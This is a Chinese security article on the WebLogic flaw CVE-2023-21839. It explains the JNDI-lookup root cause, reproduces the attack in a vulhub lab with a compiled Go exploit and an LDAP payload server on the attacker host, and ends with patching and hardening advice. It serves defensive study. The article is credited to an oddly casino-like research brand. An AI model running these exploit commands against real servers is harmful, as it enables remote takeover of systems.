安全研究 | 如何有效保护Weblogic服务器免受CVE-2023-21839攻击
Weblogic简介
随着网络技术的发展和应用范围的扩大,Weblogic服务器作为一种常用的应用服务器,在企业中广泛应用。然而,Weblogic服务器也面临着来自黑客的攻击威胁,而CVE-2023-21839作为最新的漏洞已经被公开,需要我们采取有效措施来保护Weblogic服务器免受攻击。
CVE-2023-21839详解
CVE-2023-21839是Weblogic产品中的远程代码执行漏洞,未经身份验证的远程攻击者能够利用该漏洞,通过T3/IIOP协议网络访问脆弱的Weblogic服务器,可能会导致Oracle Weblogic服务器被控制,远程注入操作系统命令或代码。
1.漏洞原理:
T3/IIOP协议支持远程绑定对象bind到服务端,而且可以通过lookup代码c.lookup(“xxxxxx”); 查看。远程对象继承自OpaqueReference并lookup查看远程对象时,服务端会调用远程对象getReferent方法。由于
weblogic.deployment.jms.ForeignOpaqueReference继承自OpaqueReference并实现getReferent方法,存在
retVal = context.lookup(this.remoteJNDIName)实现,所以能够通过RMI/LDAP远程协议进行远程命令执行。
2.影响范围:
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0
3.漏洞复现:
靶机环境:Docker vulhub
攻击机环境:Windows10
靶机IP为192.168.50.188
图片 1:目标机ip
靶机需要提前搭建docker、docker-compose、vulhub,随后在CVE-2023-21839目录下启动环境:docker-compose up -d
图片 2 :docker环境搭建
靶机访问hxxp://192.168.50.188:7001/console/login/LoginForm.jsp,确认环境已成功搭建。
图片 3:环境搭建完成
攻击机IP为192.168.50.17
图片 4:攻击机ip
把用go语言编写的漏洞利用exp编译成exe(需要go语言环境):go build -o CVE-2023-21839.exe
图片 5:攻击机使用go将exp编译成exe
根据payload利用工具提示,构造ldap语句:java -jar xxx.jar -u
图片 6:payload利用工具提示
启动payload利用工具:java -jar xxx.jar --ip 192.168.50.17
图片 7:启用payload利用工具
利用exp进行复现漏洞,创建powershell.txt文件:CVE-2023-21839.exe -ip 192.168.50.188 -port 7001 -ldap ldap://192.168.50.17:1389/Basic/Command/touch%20powershell.txt
图片 8:执行语句
在靶机上验证powershell.txt是否已被成功创建,能够看到powershell.txt确实已被成功创建。
图片9:目标机结果
关闭靶机环境。
图片 10:目标机关闭漏洞环境
防护建议
CVE-2023-21839这一漏洞允许攻击者远程执行代码,获取服务器权限,会对企业网络和数据造成严重损失。因此,威斯尼斯人wns2299cn安全研究院建议您采取以下有效措施来保护Weblogic服务器免受攻击:
首先,我们需要对Weblogic服务器进行深入的漏洞分析,了解漏洞的本质和可能产生的影响。通过分析漏洞的原理,我们可以找到漏洞的入口点,并尝试利用漏洞实现远程执行代码,以验证漏洞的有效性。在确认漏洞确实存在之后,我们需要尽快采取关闭T3和iiop协议端口等有效措施来防止攻击。
其次,我们需要寻找并安装相应的补丁程序。由于漏洞是由软件程序中的错误导致的,因此软件供应商通常会在发现漏洞后发布相应的补丁程序。我们需要及时查找并安装这些补丁程序,以修复漏洞并增强服务器的安全性。对该情况而言,可以参考Oracle手册,安装Oracle Weblogic Server最新安全补丁,详见网址:
https://www.oracle.com/security-alerts/cpujan2023.html
第三,我们需要对Weblogic服务器进行安全加固和配置调整。安全加固可以帮助我们识别并修复潜在的安全漏洞,包括限制服务器访问权限、修改默认用户名和密码、关闭不必要的服务和端口等。此外,我们还需要对服务器的配置进行调整,以提高服务器的安全性和稳定性。
最后,我们需要加强人员的安全意识和培训。由于Weblogic服务器的安全性需要人员的共同维护,安全意识和培训包括教育用户采用强密码、不随意打开附件、不信任来路不明的链接等,以防范攻击者通过钓鱼等手段获取服务器权限。
综上所述,对于CVE-2023-21839这一漏洞,我们需要采取多重措施来保护Weblogic服务器的安全性。包括深入分析漏洞、寻找并安装补丁程序、进行安全加固和配置调整,以及加强人员的安全意识和培训。只有通过综合手段加强Weblogic服务器的安全性,才能有效防范黑客攻击,保护企业网络和数据的安全。